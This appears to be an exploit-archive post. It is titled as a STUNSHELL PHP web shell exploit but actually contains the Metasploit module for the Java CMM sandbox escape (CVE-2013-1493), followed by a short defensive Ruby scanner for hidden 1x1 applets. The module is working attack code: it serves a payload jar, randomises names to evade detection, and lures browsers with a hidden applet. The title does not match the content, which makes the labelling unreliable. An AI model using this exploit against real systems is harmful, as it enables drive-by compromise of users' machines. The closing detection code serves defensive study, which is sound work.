STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and
  # randomize the name of the entry class so the jar does not carry a fixed string.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)
    super
  end

  # Serve the jar on *.jar requests, the landing page on the resource root,
  # and redirect anything else to the root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the fixed "metasploit"/"Payload" strings in entry names and contents
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page: a 1x1 applet that loads the randomly named jar and entry class.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
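From the defender's side, the landing page the module's generate_html emits has a recognisable shape: a 1x1 applet whose archive and code attributes are random alphabetic names. The following scanner is an added example (it is not part of this post or of Metasploit) that flags that shape in captured HTML; the heuristics and the two sample documents are constructed for this example.

```ruby
# Added example, not Metasploit code: flag hidden applets of the shape produced
# by the module's generate_html (1x1 <applet>, random-looking .jar and .class names).

APPLET_RE = /<applet\b([^>]*)>/i            # opening <applet ...> tags
ATTR_RE   = /(\w+)\s*=\s*["']([^"']*)["']/  # name="value" attribute pairs

# Parse the attributes of one <applet> tag into a lowercase-keyed hash.
def applet_attrs(tag_body)
  tag_body.scan(ATTR_RE).each_with_object({}) { |(k, v), h| h[k.downcase] = v }
end

# An applet with both width and height of 1 pixel or less is invisible to the user.
def hidden?(attrs)
  attrs.key?('width') && attrs.key?('height') &&
    attrs['width'].to_i <= 1 && attrs['height'].to_i <= 1
end

# Heuristic approximation of rand_text_alpha output: letters only, mixed case,
# no package dots or hyphens as real-world jar/class names usually have.
# (rand_text_alpha can also yield single-case names, so this is a weak signal alone.)
def random_alpha_name?(name)
  base = name.sub(/\.(jar|class)\z/i, '')
  base.match?(/\A[A-Za-z]{4,}\z/) && base.match?(/[a-z]/) && base.match?(/[A-Z]/)
end

# Return one finding per applet; suspicious when at least two signals coincide.
def scan_applets(html)
  html.scan(APPLET_RE).map(&:first).map do |body|
    a = applet_attrs(body)
    reasons = []
    reasons << 'hidden 1x1 applet' if hidden?(a)
    reasons << 'random-looking jar name' if a['archive'] && random_alpha_name?(a['archive'])
    reasons << 'random-looking class name' if a['code'] && random_alpha_name?(a['code'])
    { archive: a['archive'], code: a['code'], reasons: reasons, suspicious: reasons.size >= 2 }
  end
end

# Constructed sample pages (not captured traffic).
SAMPLE_MALICIOUS = '<html><body><p>Loading, Please Wait...</p>' \
  '<applet archive="qWzKpLmR.jar" code="Xbqz.class" width="1" height="1"></applet></body></html>'
SAMPLE_BENIGN = '<html><body>' \
  '<applet archive="chart-viewer.jar" code="com.example.Chart.class" width="640" height="480"></applet></body></html>'

if __FILE__ == $0
  [SAMPLE_MALICIOUS, SAMPLE_BENIGN].each { |doc| scan_applets(doc).each { |f| puts f.inspect } }
end
```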